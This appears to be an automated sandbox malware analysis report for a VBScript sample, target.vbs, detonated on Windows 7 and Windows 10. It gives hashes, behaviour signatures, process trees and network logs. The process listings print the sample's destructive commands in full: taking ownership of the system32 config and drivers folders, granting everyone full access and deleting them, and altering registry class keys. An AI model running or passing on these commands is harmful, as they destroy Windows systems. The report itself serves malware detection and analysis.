Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-1h8e6a1alj
Target target.vbs
SHA256 ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9

Threat Level: Likely malicious

The file target.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Runs regedit.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:40

Reported

2024-08-15 21:43

Platform

win7-20240729-en

Max time kernel

122s

Max time network

127s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2184 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2184 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2804 wrote to memory of 2640 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2804 wrote to memory of 2640 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2804 wrote to memory of 2640 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2804 wrote to memory of 2972 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2804 wrote to memory of 2972 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2804 wrote to memory of 2972 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2640 wrote to memory of 1876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2640 wrote to memory of 1876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2640 wrote to memory of 1876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2972 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2972 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2972 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2640 wrote to memory of 1744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2640 wrote to memory of 1744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2640 wrote to memory of 1744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2972 wrote to memory of 904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2972 wrote to memory of 904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2972 wrote to memory of 904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs

MD5 84b27604951d4deb2f10cc65c8f5c8a4
SHA1 74b27bad7133462abf462923dd3d056a4d655941
SHA256 ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
SHA512 d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce

C:\Users\Admin\Desktop\EditSend.vbs

MD5 dfcef0997fe6b53193f96908bc2d7839
SHA1 bec87de5852184953fe5025aa7a6017e23deead1
SHA256 9d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168
SHA512 ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:40

Reported

2024-08-15 21:43

Platform

win10v2004-20240802-en

Max time kernel

139s

Max time network

128s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*.dll\ C:\Windows\System32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*.exe C:\Windows\System32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*.exe\ C:\Windows\System32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*.dll C:\Windows\System32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2028 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2028 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4984 wrote to memory of 2024 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4984 wrote to memory of 2024 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4984 wrote to memory of 3472 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4984 wrote to memory of 3472 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2024 wrote to memory of 4228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2024 wrote to memory of 4228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3472 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3472 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2024 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2024 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3472 wrote to memory of 4060 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3472 wrote to memory of 4060 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4984 wrote to memory of 2564 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 4984 wrote to memory of 2564 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 4984 wrote to memory of 1332 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 4984 wrote to memory of 1332 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 4984 wrote to memory of 3432 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 4984 wrote to memory of 3432 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCR\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCR\*.exe

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKLM\*

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 52.111.229.48:443 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs

MD5 84b27604951d4deb2f10cc65c8f5c8a4
SHA1 74b27bad7133462abf462923dd3d056a4d655941
SHA256 ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
SHA512 d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce

C:\Users\Admin\Desktop\DenyRedo.vbs

MD5 dfcef0997fe6b53193f96908bc2d7839
SHA1 bec87de5852184953fe5025aa7a6017e23deead1
SHA256 9d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168
SHA512 ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74